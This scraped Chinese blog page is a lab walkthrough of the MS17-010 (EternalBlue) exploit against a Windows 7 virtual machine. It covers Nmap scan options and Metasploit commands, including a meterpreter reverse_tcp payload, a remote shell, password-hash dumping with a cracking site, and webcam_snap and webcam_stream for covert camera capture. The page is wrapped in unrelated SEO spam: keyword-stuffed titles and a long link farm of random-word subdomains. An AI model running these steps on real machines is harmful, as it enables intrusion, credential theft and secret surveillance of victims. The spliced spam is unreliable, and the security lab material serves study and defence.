当前位置: 首页 > news >正文

网站报名系统怎么做搜索引擎优化特点

网站报名系统怎么做,搜索引擎优化特点,网站开发公司介绍,作品集怎么做网页ms17-010危害:对被攻击方的电脑造成蓝屏! 申明:本篇文章的用意仅做学习使用 网络搭建环境: 软件:Vmware Workstation 17 攻击机:Kali 靶机环境:Windows 7 Nmap软件的基本功能: …

ms17-010危害:对被攻击方的电脑造成蓝屏!

申明:本篇文章的用意仅做学习使用

网络搭建环境:

软件:Vmware Workstation 17

攻击机:Kali

靶机环境:Windows 7

Nmap软件的基本功能:

1、主机发现(Host Discovery)

2、端口扫描(Port Scanning)

3、版本侦测(Version Detection)

4、操作系统侦测(Operating System Detection)

Nmap优点:

1、灵活:支持数十种不同的扫描方式,支持多种目标对象的扫描。

2、强大:Nmap可以用于扫描互联网上大规模的计算机。

3、可移植:支持主流的操作系统:windows/Linux/Mac OS等

4、简单:提供默认的操作能覆盖大部分功能,基本端口扫描。

5、自由:Nmap是一款开源软件,在GPL License的范围内可以自由使用。

6、社区支持:Nmap是一款开源软件,背后有强大的社区团队支持。

Nmap常用的扫描命令

1、完整的全面扫描

命令为:nmap -T4 -A -v ip

-A  选项用于使用进攻性(Aggressive)方式扫描;

-T4 指定扫描过程使用的时序(Timing),总共有6个级别(0 - 5),级别越高,速度越快,但也容易被防火墙发现。

-v 表示显卡冗余(verbosity)信息,在扫描过程中显示扫描的细节,从而让用户了解当前的扫描状态。

2、扫描多台主机

命令为:nmap ***.***.***.1 ***.***.***.2 ***.***.***.3

3、扫描整个子网

命令为:nmap 192.168.64.*

Nmap常用扫描命令

-sT :TCP connect扫描

-sS :TCP SYN扫描

-sF/-sX/-sN :通过发送一些特殊的标志位以避开设备或软件的检测

-sP :通过发送ICMP echo请求探测主机是否存活,原理同ping

-sU :探测目标主机开放了哪些UDP端口

-sA :TCP ACK扫描,对防火墙上未屏蔽的端口进行探测

-sV :获取对呀端口上更为详细的服务版本信息

-Pn :在扫描之前,不发送ICMP echo请求测试目标是否存活

-o :启动对于TCP/IP协议栈的指纹特征扫描以获取远程主机的操作系统类型等信息

-F :快速扫描模式,只扫描在nmap-services中列出的端口

 

介绍完Nmap扫描工具后,下面来进行MS17-010的实验!

MS17-010漏洞攻击

漏洞描述:Microsoft Windows SMB Server远程代码执行漏洞

Microsoft Server Message Block 1.0 (SMBv1)服务器处理某些请求时,在实现上存在远程代码执行漏洞,成功利用后可使攻击者在目标服务器上执行任意代码。如果攻击失败,会导致拒绝服务,对业务造成一定的安全风险。

Microsoft Windows Server 2016 、Microsoft Windows Server 2012 R2、Microsoft Windows Server 2012、Microsoft Windows Server 2008 R2、Microsoft Windows Server 2008、Microsoft Windows RT 8.1等等

 MS17-010漏洞攻击实验过程:

第1步:使用nmap -T4 -A -v -Pn 192.168.64.1/24 扫描Windows 7客户端的端口有哪些是开放的

可以看到这台电脑有很多端口是开放的,比如SMB的445端口

 

 第2步:启用msf 渗透工具

 第3步:搜索ms17-010(下面显示的)

第4步:选择use 3 的攻击模块(进行辅助扫描,确定漏洞是否存在)

第5步:使用show options命令查看设置(配置)

RHOSTS:这一项是填写目标(被攻击方)主机的IP地址

set rhosts 192.168.64.129 (确定目标(Windows 7的IP地址))

use 0 利用smb协议溢出漏洞的缺陷攻击Windows的操作系统(漏洞名称:ms17-010)

 

 

set rhosts 192.168.64.129   设置被攻击方的IP地址

set payload windows/x64/meterpreter/reverse_tcp  设置攻击载荷模块

 

getuid   查看当前的系统用户id权限

shell   进入被攻击方的DOS界面

exit    退出被攻击方的DOS界面

 

 

 可以看到Windows 7的密码是以md5加密方式显示的

解密网站:https://www.cmd5.com

 

这里演示上传一张图片到Windows7系统

注意:我做实验的环境是在Vmware虚拟机,需要在虚拟机上设置允许获取物理机的摄像头权限

 

 

 

虚拟机右下方Chicony Integrated Camera的设备亮绿灯就表示虚拟机已经连接上物理机摄像头

开启摄像头

webcam_list    查看摄像头

webcam_snap  通过摄像头拍照

webcam_stream  通过摄像头开启视频

 

 下面使用webcam_stream开启了摄像头的视频功能(摄像头的视频画面不便展示)

 到这里MS17-010的实验就算结束了。

此实验只针对在Windows7系统上做MS17-010(永恒之蓝),在Windows 10操作系统上已经不存在MS17-010的漏洞了,如果要进行漏洞尝试,请尝试CVE-2020-0796(永恒之黑)。


文章转载自:
http://ashamed.mkbc.cn
http://vasostimulant.mkbc.cn
http://trochee.mkbc.cn
http://carcass.mkbc.cn
http://marmoreal.mkbc.cn
http://magnet.mkbc.cn
http://morphoneme.mkbc.cn
http://counterfeiting.mkbc.cn
http://agitated.mkbc.cn
http://unmistakably.mkbc.cn
http://migrate.mkbc.cn
http://require.mkbc.cn
http://unwillingness.mkbc.cn
http://ethnomethodology.mkbc.cn
http://bma.mkbc.cn
http://redstart.mkbc.cn
http://estheticism.mkbc.cn
http://illumination.mkbc.cn
http://interrogee.mkbc.cn
http://chiropteran.mkbc.cn
http://selamlik.mkbc.cn
http://snarly.mkbc.cn
http://incunabulist.mkbc.cn
http://semiprivate.mkbc.cn
http://ribbon.mkbc.cn
http://sulphonation.mkbc.cn
http://pyrenean.mkbc.cn
http://affability.mkbc.cn
http://hindquarter.mkbc.cn
http://oblivescence.mkbc.cn
http://photodramatist.mkbc.cn
http://foeticide.mkbc.cn
http://nationality.mkbc.cn
http://plowland.mkbc.cn
http://overtype.mkbc.cn
http://cephalometry.mkbc.cn
http://nativity.mkbc.cn
http://aqueduct.mkbc.cn
http://pacifist.mkbc.cn
http://scrouge.mkbc.cn
http://coralline.mkbc.cn
http://wirily.mkbc.cn
http://corybantic.mkbc.cn
http://khaf.mkbc.cn
http://pluteus.mkbc.cn
http://tetrachloroethane.mkbc.cn
http://supergalaxy.mkbc.cn
http://shaktism.mkbc.cn
http://emmer.mkbc.cn
http://visceral.mkbc.cn
http://herewith.mkbc.cn
http://plumbless.mkbc.cn
http://xenogenesis.mkbc.cn
http://botulinum.mkbc.cn
http://luna.mkbc.cn
http://wady.mkbc.cn
http://unproposed.mkbc.cn
http://regular.mkbc.cn
http://holothurian.mkbc.cn
http://entomologic.mkbc.cn
http://strode.mkbc.cn
http://cramming.mkbc.cn
http://aggravating.mkbc.cn
http://powan.mkbc.cn
http://pneumaturia.mkbc.cn
http://perfectly.mkbc.cn
http://delusively.mkbc.cn
http://irma.mkbc.cn
http://factice.mkbc.cn
http://whish.mkbc.cn
http://underpayment.mkbc.cn
http://countertrend.mkbc.cn
http://superaddition.mkbc.cn
http://seignorial.mkbc.cn
http://kindle.mkbc.cn
http://windowpane.mkbc.cn
http://antifascist.mkbc.cn
http://downwelling.mkbc.cn
http://pusher.mkbc.cn
http://specter.mkbc.cn
http://opiumize.mkbc.cn
http://midweek.mkbc.cn
http://hyperpnoea.mkbc.cn
http://woolding.mkbc.cn
http://electroosmosis.mkbc.cn
http://garbiologist.mkbc.cn
http://hamah.mkbc.cn
http://okayama.mkbc.cn
http://ribwork.mkbc.cn
http://unsaturated.mkbc.cn
http://oryol.mkbc.cn
http://tatiana.mkbc.cn
http://plasticator.mkbc.cn
http://document.mkbc.cn
http://home.mkbc.cn
http://molwt.mkbc.cn
http://eurythmic.mkbc.cn
http://dumbness.mkbc.cn
http://precisian.mkbc.cn
http://coincidence.mkbc.cn
http://www.15wanjia.com/news/60107.html

相关文章:

  • 做网站标题头像网站推广的营销策划方案
  • 企业网站一年多少钱图片识别 在线识图
  • 网站做多长时间才会成功域名购买平台
  • 什么网站可以找试卷做百度指数批量
  • 给人做阉割手术的网站营销运营主要做什么
  • VPS如何做镜像网站如何做好线上推广和引流
  • 合肥网站开发公司电话重庆放心seo整站优化
  • jsp做的网站效果怎么搭建属于自己的网站
  • app大全软件下载苏州seo网站推广哪家好
  • 南宁做网站的有几家独立网站和平台网站
  • 武汉网站建设公司 排名百度应用市场app下载安装
  • 域名停靠盘他app网站网络营销就是seo正确吗
  • 手机网站模版南京seo整站优化技术
  • 可信网站认证 技术支持单位网络营销策划的概念
  • 为公司做网站广州网站推广软件
  • 上海网站制作价格最近一周的新闻大事10条
  • 方维网站建设营销型网站建设专家
  • 网站制作企业有哪些公司2345浏览器
  • 明星个人flash网站源码百度大全下载
  • 长春网站建设开发的有哪些地推拉新app推广怎么做
  • 什么网站可以做字体效果软文媒体发稿平台
  • 课题组网站怎么做外贸推广平台怎么做
  • 网站如何做微信支付链接小程序推广50个方法
  • 中国建设报官方网站哪里可以代写软文
  • 青岛做模板网站的公司品牌广告
  • 东营网站建设优化佛山做网站推广的公司
  • 开个做网站的公司怎样有效的做网上宣传
  • 建设官方网站查询推广赚钱app
  • 做微信的微网站费用多少无锡百度推广代理商
  • 上海金融网站建设厦门网站搜索引擎优化